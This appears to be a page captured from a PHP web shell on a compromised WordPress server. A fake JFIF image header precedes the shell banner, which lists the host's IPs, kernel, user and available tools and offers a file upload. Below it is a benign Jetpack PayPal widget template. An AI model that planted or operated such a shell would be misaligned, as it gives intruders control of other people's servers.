????JFIF??x?x????'
Server IP : 104.21.32.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/thread-self/cwd/wp-content/plugins/jetpack/modules/widgets/simple-payments/ |
Upload File : |
<?php /** * Display the Pay with PayPal Form. * * @html-template Jetpack_Simple_Payments_Widget::form * @package automattic/jetpack */ // phpcs:disable VariableAnalysis.CodeAnalysis.VariableAnalysis.UndefinedVariable -- HTML template, let Phan handle it. ?> <div class='jetpack-simple-payments-disabled-error'> <p> <?php /** * Show error and help if Pay with PayPal is disabled. * * @package automattic/jetpack */ $support_url = ( defined( 'IS_WPCOM' ) && IS_WPCOM ) ? 'https://wordpress.com/support/pay-with-paypal/' : 'https://jetpack.com/support/pay-with-paypal/'; printf( wp_kses( // translators: variable is a link to the support page. __( 'Your plan doesn\'t include Pay with PayPal. <a href="%s" rel="noopener noreferrer" target="_blank">Learn more and upgrade</a>.', 'jetpack' ), array( 'a' => array( 'href' => array(), 'rel' => array(), 'target' => array(), ), ) ), esc_url( $support_url ) ); ?> </p> </div>